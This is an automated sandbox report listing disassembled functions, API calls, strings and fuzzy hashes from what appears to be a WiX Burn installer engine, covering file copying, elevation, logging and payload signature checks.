LeaveCriticalSection.KERNEL32(?), ref: 00D6F19B

Strings

Engine is active, cannot change engine state., xrefs: 00D6F089
Failed to copy the arguments., xrefs: 00D6F12D
Failed to copy the id., xrefs: 00D6F100
Failed to post launch approved exe message., xrefs: 00D6F186
UX requested unknown approved exe with id: %ls, xrefs: 00D6F0CE
EngineForApplication.cpp, xrefs: 00D6F17C

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 665d6f2fd97f7e889df7a04546a93b02f2a3815d41bac9bf01d425378099fd42
Instruction ID: 83788ccfa68dd9177b9d5f56618313ae79bb599dddbbd23406353cc48121e171
Opcode Fuzzy Hash: 665d6f2fd97f7e889df7a04546a93b02f2a3815d41bac9bf01d425378099fd42
Instruction Fuzzy Hash: 5631D632A40B25EFCB219F68EC05E6A77A8EF05760B054525FD04EF251EB35DD0087B0

Function 00D53076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 00D530C1
GetLastError.KERNEL32 ref: 00D530C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00D53121
GetLastError.KERNEL32 ref: 00D53127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D531DB
GetLastError.KERNEL32 ref: 00D531E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D5323B
GetLastError.KERNEL32 ref: 00D53245

Strings

@, xrefs: 00D5309B
pathutil.cpp, xrefs: 00D530EB

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: @$pathutil.cpp
API String ID: 1547313835-3022285739
Opcode ID: 6ded0c0dd53ffac31fbbe27d04865c16950fbc558a1b3604646f46653f172677
Instruction ID: ee17093520309d1c59e4abc6d91f46967368a20b7388f15fc7b40fa02a6320e4
Opcode Fuzzy Hash: 6ded0c0dd53ffac31fbbe27d04865c16950fbc558a1b3604646f46653f172677
Instruction Fuzzy Hash: 5261C633D00B29ABDF219AE48D45B9EBBA4AB047D2F154155EE00BB250E731DF0897F4

Function 00D56037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00D56062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00D56076
GetLastError.KERNEL32 ref: 00D56088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 00D560DC
GetLastError.KERNEL32 ref: 00D560E6

Strings

Failed to get the required buffer length for the Date., xrefs: 00D560AD
variable.cpp, xrefs: 00D560A3, 00D56101
Failed to allocate the buffer for the Date., xrefs: 00D560C4
Failed to get the Date., xrefs: 00D5610B
Failed to set variant value., xrefs: 00D56124

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: 543b602d17b25542508224d128458437ba94f0732e25e47a79fe728612dd40ca
Instruction ID: f36ce76303a88df4fc8682c2d6ae54f48bc38d943df7a8a870280d1cb86c3f3d
Opcode Fuzzy Hash: 543b602d17b25542508224d128458437ba94f0732e25e47a79fe728612dd40ca
Instruction Fuzzy Hash: B731D732A407297FDF21ABA99D42EBFBA68EB04711F510126FE00F7281D660DD4886F1

Function 00D641EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00D90523: EnterCriticalSection.KERNEL32(00DBB5FC,00000000,?,?,?,00D64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D554FA,?), ref: 00D90533
Part of subcall function 00D90523: LeaveCriticalSection.KERNEL32(00DBB5FC,?,?,00DBB5F4,?,00D64207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D554FA,?), ref: 00D9067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 00D64212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00D6421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00DA39D4,00000000), ref: 00D6426B
CloseEventLog.ADVAPI32(00000000), ref: 00D64272

Strings

_Failed, xrefs: 00D641F7
Failed to open Application event log, xrefs: 00D6424C
logging.cpp, xrefs: 00D64242
txt, xrefs: 00D641F2
Setup, xrefs: 00D641FC
Application, xrefs: 00D6420C

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: 9e36b0bb50804aa5e1a5fd957c56118a11d1699d61857ed1adfd114d0ccba665
Instruction ID: 9a4d7247c002fd1902f8083c67ed7674814ef6ef03038c36924665504a62ac19
Opcode Fuzzy Hash: 9e36b0bb50804aa5e1a5fd957c56118a11d1699d61857ed1adfd114d0ccba665
Instruction Fuzzy Hash: 31F0AF33A817717F5B322266AD1AD7F5D6EDACBF72712011ABD14F5280EB54890580F8

Function 00D650CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,00D9B500), ref: 00D650D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00D65171
CloseHandle.KERNEL32(00000000), ref: 00D6518A

Strings

open, xrefs: 00D6513B, 00D65149
Failed to launch elevated child process: %ls, xrefs: 00D6515E
runas, xrefs: 00D65131
-q -%ls %ls %ls %u, xrefs: 00D650F8
Failed to allocate parameters for elevated process., xrefs: 00D6510C
burn.elevated, xrefs: 00D650F3

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 7c9077af8a903b8295fbbe47c8b0fe19ffbdaa2b5d1d6d0bf85ff33df1297b87
Instruction ID: 5d6fd6e8f251f62a9dc5f1f4608899246cad344335c071bbc88e7a2969cc79a0
Opcode Fuzzy Hash: 7c9077af8a903b8295fbbe47c8b0fe19ffbdaa2b5d1d6d0bf85ff33df1297b87
Instruction Fuzzy Hash: 87215775D0070DFF8F119F94EC819AEBB78EF0A350F50816AF815A2211D7B59E909BB0

Function 00D69098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00D69F04,00000003,000007D0,00000003,?,000007D0), ref: 00D690B2
GetLastError.KERNEL32(?,00D69F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 00D690BF
CloseHandle.KERNEL32(00000000,?,00D69F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00D69187

Strings

Failed to verify catalog signature of payload: %ls, xrefs: 00D6914E
Failed to open payload at path: %ls, xrefs: 00D69103
Failed to verify hash of payload: %ls, xrefs: 00D69172
cache.cpp, xrefs: 00D690F6
Failed to verify signature of payload: %ls, xrefs: 00D6912F

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 5b67e0a9902cc51a80e1c78e2e5c4ca46c15a69cbdf0e9a0aecfcbffc2607cd8
Instruction ID: aca6f91b2a09548a83c00146a97e67c02ceaa4ac7efa458f1df1bfd1b0640bfe
Opcode Fuzzy Hash: 5b67e0a9902cc51a80e1c78e2e5c4ca46c15a69cbdf0e9a0aecfcbffc2607cd8
Instruction Fuzzy Hash: D4210732540727BBCB321B648D5DF9ABA1CEF067B0F254212FC0466190D3399C61DAF1

Function 00D571FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00D57210

Strings

Failed to append escape sequence., xrefs: 00D572A3
[\%c], xrefs: 00D5726F
Failed to allocate buffer for escaped string., xrefs: 00D57227
Failed to format escape sequence., xrefs: 00D572AA
Failed to append characters., xrefs: 00D5729C
[]{}, xrefs: 00D5723A
Failed to copy string., xrefs: 00D572C4

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: 0c6d599565bdb9e34f123e840d5a83c67298146e153276813817245d1f635ff8
Instruction ID: 2243573c89dd310e6bf74e5d21109f3b340771245759b67cabb5bb1c824ed242
Opcode Fuzzy Hash: 0c6d599565bdb9e34f123e840d5a83c67298146e153276813817245d1f635ff8
Instruction Fuzzy Hash: 1C21A236D49619BBDF219A90AC46FAE7BA9DF10B22F300156FD00B6140DB719E4992B8

Function 00D941E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,00D9432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,00D6A063,00000001), ref: 00D94203
GetLastError.KERNEL32(00000002,?,00D9432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,00D6A063,00000001,000007D0,00000001,00000001,00000003), ref: 00D94212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,00D9432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,00D6A063,00000001), ref: 00D942A6
GetLastError.KERNEL32(?,00D9432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,00D6A063,00000001,000007D0,00000001), ref: 00D942B0

Part of subcall function 00D94440: FindFirstFileW.KERNEL32(00D7923A,?,00000100,00000000,00000000), ref: 00D9447B
Part of subcall function 00D94440: FindClose.KERNEL32(00000000), ref: 00D94487

Strings

\, xrefs: 00D94265
fileutil.cpp, xrefs: 00D942CF

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: 8b8c95385b214aa6ecc30f69205bc862f5bd275a32b08ebc33bc2947f96797a3
Instruction ID: d9e36151caa833be9cff156e7b101af782da1dfb04a66c0d789a20abeabd27fd
Opcode Fuzzy Hash: 8b8c95385b214aa6ecc30f69205bc862f5bd275a32b08ebc33bc2947f96797a3
Instruction Fuzzy Hash: 8731D136B01226DBDF215F95CC10E6F7A69FF51760B19412AFC059B212D3708C4287F8

Function 00D5F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00D60654,00000001,00000001,00000001,00D60654,00000000), ref: 00D5F07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00D60654,00000001,00000001,00000001,00D60654,00000000,00000001,00000000,?,00D60654,00000001), ref: 00D5F09A

Strings

Failed to remove update registration key: %ls, xrefs: 00D5F0C7
Failed to format key for update registration., xrefs: 00D5F033
PackageVersion, xrefs: 00D5F05E

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: ee680a3b48034ddcfec31353a011ff4293740e6df147cc6be79ea9d99105345e
Instruction ID: 2f05eae7a28dbf95085122ba18246fc38abe01e9b668fa9fd815e3ebe5380b5a
Opcode Fuzzy Hash: ee680a3b48034ddcfec31353a011ff4293740e6df147cc6be79ea9d99105345e
Instruction Fuzzy Hash: 77219332D00229BBCF21ABA9DD09FAEBEB8DF01721F140275BD14E6195E7318A44C6B0

Function 00D94019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00D54DBC,00000000,?,?,00000000,?,00D9412D,00000000,00D54DBC,00000000,00000000,?,00D685EE,?,?), ref: 00D94033
GetLastError.KERNEL32(?,00D9412D,00000000,00D54DBC,00000000,00000000,?,00D685EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00D94041
CopyFileW.KERNEL32(00000000,00D54DBC,00000000,00D54DBC,00000000,?,00D9412D,00000000,00D54DBC,00000000,00000000,?,00D685EE,?,?,00000001), ref: 00D940AC
GetLastError.KERNEL32(?,00D9412D,00000000,00D54DBC,00000000,00000000,?,00D685EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00D940B6

Strings

fileutil.cpp, xrefs: 00D940D5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 06e3032eb2cc6b91a3bd13831fa5c9f9d57dfd3408efb3b9a39a32adc6568dbc
Instruction ID: 34b97a15c7c93edaa435216e8d5e59c0ba4f26247d331005c54d864fd74f404c
Opcode Fuzzy Hash: 06e3032eb2cc6b91a3bd13831fa5c9f9d57dfd3408efb3b9a39a32adc6568dbc
Instruction Fuzzy Hash: 1921AF267013369B9F300AA65C40F7B6A98EF15BA0B190136FF0CDB252E7518C4292F1

Function 00D561DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00D5620F
GetLastError.KERNEL32 ref: 00D56219

Strings

variable.cpp, xrefs: 00D56238
Failed to get the user name., xrefs: 00D56242
Failed to set variant value., xrefs: 00D5625E

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: a20fdacb74e4734283d125b4e3bfce7d92fe8ee7b976ba2be06a46cc4ef88e05
Instruction ID: 5d30f0317284b98fab5190ec2fff04824dab3d9b2e386eb0c9ff6d54eae35f65
Opcode Fuzzy Hash: a20fdacb74e4734283d125b4e3bfce7d92fe8ee7b976ba2be06a46cc4ef88e05
Instruction Fuzzy Hash: 1401B932F01338ABCF219B559C06AAF7BA8DB01721F510256FD14E7281EA74DD484AF5

Function 00D521AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8000FFFF,00000000,?,?,00000000,00000000,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D521F2
GetLastError.KERNEL32(?,00000000,00000000,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D521FE

Part of subcall function 00D53BD3: GetProcessHeap.KERNEL32(00000000,?,?,00D521CC,?,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53BDB
Part of subcall function 00D53BD3: HeapSize.KERNEL32(00000000,?,00D521CC,?,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53BE2

Strings

strutil.cpp, xrefs: 00D52222

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 2ef856068f66c2fc3bb52c4005ef1c5ed0f74a0a6adb0f3087f6409d16ca21c2
Instruction ID: 787d9971c0d578caec1359a3d0247649c56a0f6ddb02f76e27529e45aa5685e5
Opcode Fuzzy Hash: 2ef856068f66c2fc3bb52c4005ef1c5ed0f74a0a6adb0f3087f6409d16ca21c2
Instruction Fuzzy Hash: E031F93A601226ABDF208EA5CC44A7A3A95AF16776F150225FD55AF290D631DC0C86F8

Function 00D7D152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,00D7D148,00000000), ref: 00D7D16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00D7D148,00000000), ref: 00D7D179
CloseHandle.KERNEL32(00D9B518,00000000,?,00000000,?,00D7D148,00000000), ref: 00D7D186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00D7D148,00000000), ref: 00D7D193
UnmapViewOfFile.KERNEL32(00D9B4E8,00000000,?,00D7D148,00000000), ref: 00D7D1A2

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 8cdc186dbd21c4fbb10c81ed943a4c8a8a819a33074164d8e4ed22847804b555
Instruction ID: 78e0a16777c97463beb9f21aafea9d0069bf2463e83d16f016ad4ed78139268b
Opcode Fuzzy Hash: 8cdc186dbd21c4fbb10c81ed943a4c8a8a819a33074164d8e4ed22847804b555
Instruction Fuzzy Hash: 1301FB72400B15DFCB31AF65D980816F7FAEF50761359C93EE9AA52930D371A850CF60

Function 00D7D1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,00D7D3EE,00000000,00000000,00000000,?), ref: 00D7D1C3
ReleaseMutex.KERNEL32(?,?,00D7D3EE,00000000,00000000,00000000,?), ref: 00D7D24A

Part of subcall function 00D5394F: GetProcessHeap.KERNEL32(?,?,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53960
Part of subcall function 00D5394F: RtlAllocateHeap.NTDLL(00000000,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53967

Strings

NetFxChainer.cpp, xrefs: 00D7D208
Failed to allocate memory for message data, xrefs: 00D7D212

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: db68d7300e7287b6b54389552e64e71c31156a29c9bbf8f305b9e94409cb2a6e
Instruction ID: 39db66c7aafb387549b76b5bbd5d4ed3ecc9443bdda242b23b52598a7870661f
Opcode Fuzzy Hash: db68d7300e7287b6b54389552e64e71c31156a29c9bbf8f305b9e94409cb2a6e
Instruction Fuzzy Hash: 7E11BFB1300215EFCB159F68E881E5ABBF5FF09720B104165F9189B361C731AC10CBB8

Function 00D931EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00D93200
SysFreeString.OLEAUT32(00000000), ref: 00D93230

Strings

`5w, xrefs: 00D93230
xmlutil.cpp, xrefs: 00D93214

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: 4726773116168a08eee89a006e0bbfbbc44a73424dca2a900b588f5a095c31ce
Instruction ID: d39147864db9a220ec3eab98d676f10f5010e3221757ae664fe09667bb8aae4d
Opcode Fuzzy Hash: 4726773116168a08eee89a006e0bbfbbc44a73424dca2a900b588f5a095c31ce
Instruction Fuzzy Hash: 21F0BE31101654EBCB314F84AC08FAB7BA8AB80BA0F29402AFC05AB210C774DE1096F4

Function 00D8615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00D81AEC,00000000,76C1B38F,?,00D81DF0,00000000,76C1B38F,00000000,00000000), ref: 00D86162
